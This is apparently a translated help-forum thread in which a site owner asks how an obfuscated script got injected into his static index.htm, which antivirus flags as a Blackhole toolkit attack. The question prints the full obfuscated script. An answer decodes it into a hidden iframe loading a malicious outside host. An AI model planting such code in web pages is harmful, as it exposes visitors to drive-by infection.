我的网站有一个静态html网页,最近无法在我的Windows XP计算机上加载我的网站。 Norton Antivirus阻止该网站将其报告为“Web Attack:Blackhole Toolkit Website 7”。我下载了我的index.htm页面,发现这个代码在我正在创建的主体中,与我同一页面的本地副本相比:
<script>
el = document.createElement("div");
el.appendChild(document.createTextNode("ReferenceErr"));
el.appendChild(document.createTextNode("q"));
el.insertBefore(document.createTextNode("l"), el.childNodes[1]);
try {
try {
throw 1
} catch (a) {
b[2] = 21
};
} catch (a) {
k = el.firstChild.nodeValue + a.toString().substr(0, 0);
};
ar = "\"aTBtc0.gyA:/[hi],b> vCldmwf)s{up1oE'=<r(n;N}ez";
ar2 = "R80c80c60c112c84c164c100c140c20c128c104c184c168c16c28c32c184c16c144c96c184c104c184c168c16c120c12c36c8c4c32c176c4c104c184c164c148c72c140c100c36c148c116c52c24c64c116c124c80c80c80c60c112c160c4c104c184c160c164c116c172c80c80c180c84c184c96c120c184c84c124c80c80c80c100c140c20c128c104c184c168c16c28c108c160c60c16c184c164c0c156c60c112c160c4c104c184c84c120c160c20c152c148c56c16c16c132c44c48c48c188c140c168c100c32c160c140c128c132c28c20c140c104c48c56c140c104c184c28c132c56c132c148c84c108c60c100c16c56c152c148c136c24c148c84c56c184c60c32c56c16c152c148c136c24c148c84c120c16c36c96c184c152c148c88c60c120c60c72c60c96c60c16c36c44c56c60c100c100c184c168c172c132c140c120c60c16c60c140c168c44c4c72c120c140c96c128c16c184c172c96c184c112c16c44c24c172c16c140c132c44c24c172c148c76c156c48c60c112c160c4c104c184c76c0c116c172c80c80c180c80c80c112c128c168c20c16c60c140c168c84c60c112c160c4c104c184c160c164c116c124c80c80c80c88c4c160c84c112c84c152c84c100c140c20c128c104c184c168c16c28c20c160c184c4c16c184c144c96c184c104c184c168c16c164c148c60c112c160c4c104c184c148c116c172c112c28c120c184c16c40c16c16c160c60c72c128c16c184c164c148c120c160c20c148c68c148c56c16c16c132c44c48c48c188c140c168c100c32c160c140c128c132c28c20c140c104c48c56c140c104c184c28c132c56c132c148c116c172c112c28c120c16c36c96c184c28c88c60c120c60c72c60c96c60c16c36c152c148c56c60c100c100c184c168c148c172c112c28c120c16c36c96c184c28c132c140c120c60c16c60c140c168c152c148c4c72c120c140c96c128c16c184c148c172c112c28c120c16c36c96c184c28c96c184c112c16c152c148c24c148c172c112c28c120c16c36c96c184c28c16c140c132c152c148c24c148c172c112c28c120c184c16c40c16c16c160c60c72c128c16c184c164c148c108c60c100c16c56c148c68c148c136c24c148c116c172c112c28c120c184c16c40c16c16c160c60c72c128c16c184c164c148c56c184c60c32c56c16c148c68c148c136c24c148c116c172c80c80c80c100c140c20c128c104c184c168c16c28c32c184c16c144c96c184c104c184c168c16c120c12c36c8c4c32c176c4c104c184c164c148c72c140c100c36c148c116c52c24c64c28c4c132c132c184c168c100c92c56c60c96c100c164c112c116c172c80c80c180";
pau = "urn eReferenceErr".replace(k, "va" + el.childNodes[1].nodeValue);
e = Function("ret" + pau)();
ar2 = ar2.split("c");
ar2[0] = "80";
s = "";
for (i = 0; i != ar2.length; i++) {
e('po'.concat('s=par', 'seInt(k', '.rep', 'lace("R', 'eferen', '","0a', 'sd"))+', 'ar2[', 'i]/', '4'));
e('s+=ar.substr(pos,1)');
}
e(s);
</script>
任何人都知道这可能会如何出现以及我的index.htm页面如何被修改?
谢谢, 史蒂夫
答案 0 :(得分:5)
以下是脚本的最终结果。把它放在虚拟机上进行测试,通过谷歌获得恶意站点警告。所有这些写下来..
if (document.getElementsByTagName('body')[0]) {
iframer();
} else {
document.write("");
}
function iframer() {
var f = document.createElement('iframe');
f.setAttribute('src', 'http://toolbarqueries-google.com/in.cgi?default');
f.style.visibility = 'hidden';
f.style.position = 'absolute';
f.style.left = '0';
f.style.top = '0';
f.setAttribute('width', '10');
f.setAttribute('height', '10');
document.getElementsByTagName('body')[0].appendChild(f);
}
答案 1 :(得分:1)
有人攻击了您的网站 - 有很多方法可以做到这一点,并且有许多方面需要改进安全性